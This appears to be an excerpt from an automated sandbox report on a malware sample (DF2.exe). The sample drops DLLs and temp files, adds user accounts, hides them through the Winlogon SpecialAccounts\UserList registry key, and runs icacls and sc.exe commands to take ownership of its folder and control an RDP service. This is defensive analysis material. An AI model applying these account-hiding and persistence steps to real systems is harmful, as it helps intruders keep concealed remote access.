Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: DF2.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: DF2.exeStatic file information: File size 8630784 > 1048576
Source: DF2.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x69ac00
Source: Binary string: RfxVmt.pdb source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source: rfxvmt.dll.21.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CCFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF764CCFF1F
Source: DF2.exeStatic PE information: section name: .didata
Source: w8m7wmyk939oczmkw4o2h16hs.exe.1.drStatic PE information: section name: .xdata
Source: nju2apmx83wqd9u7namsf59y.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.10.drStatic PE information: section name: .xdata
Source: termsrv32.dll.21.drStatic PE information: section name: .xdata
Source: rdpctl.dll.21.drStatic PE information: section name: .xdata
Source: samctl.dll.21.drStatic PE information: section name: .xdata
Source: prgmgr.dll.21.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.21.drStatic PE information: section name: .xdata
Source: cnccli.dll.21.drStatic PE information: section name: .xdata
Source: libi2p.dll.21.drStatic PE information: section name: .xdata
Source: evtsrv.dll.21.drStatic PE information: section name: .xdata
Source: DkzUMxZ8.21.drStatic PE information: section name: .xdata
Source: bT51Gn7Q.21.drStatic PE information: section name: .xdata
Source: LcUJSdZq.21.drStatic PE information: section name: .xdata
Source: 5P46VR1V.21.drStatic PE information: section name: .xdata
Source: 6KasAPG0.21.drStatic PE information: section name: .xdata
Source: YERHbDgw.21.drStatic PE information: section name: .xdata
Source: yGODxgsj.21.drStatic PE information: section name: .xdata
Source: DiEI7oU1.21.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_0299F262 push es; retf 0_2_0299F263
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_0298675D push esi; ret 0_2_0298675F
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_02983D4E push eax; iretd 0_2_02983D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11ECFC37 push rsp; ret 21_2_00007FFE11ECFC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE126DFC37 push rsp; ret 32_2_00007FFE126DFC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E16521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,21_2_00007FFE0E16521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DiEI7oU1Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DkzUMxZ8Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\yGODxgsjJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LcUJSdZqJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YERHbDgwJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\5P46VR1VJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\2s3EMNnhJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bT51Gn7QJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\user\Desktop\DF2.exeFile created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6KasAPG0Jump to dropped file
Source: C:\Users\user\Desktop\DF2.exeFile created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DiEI7oU1Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DkzUMxZ8Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\yGODxgsjJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LcUJSdZqJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YERHbDgwJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\5P46VR1VJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\2s3EMNnhJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bT51Gn7QJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6KasAPG0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\2s3EMNnhJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DkzUMxZ8Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\bT51Gn7QJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LcUJSdZqJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\5P46VR1VJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6KasAPG0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YERHbDgwJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\yGODxgsjJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DiEI7oU1Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,21_2_00007FF76A908C4A
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2913723801.00007FFE11784000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2913723801.00007FFE11784000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.10.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.10.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\DF2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\DF2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
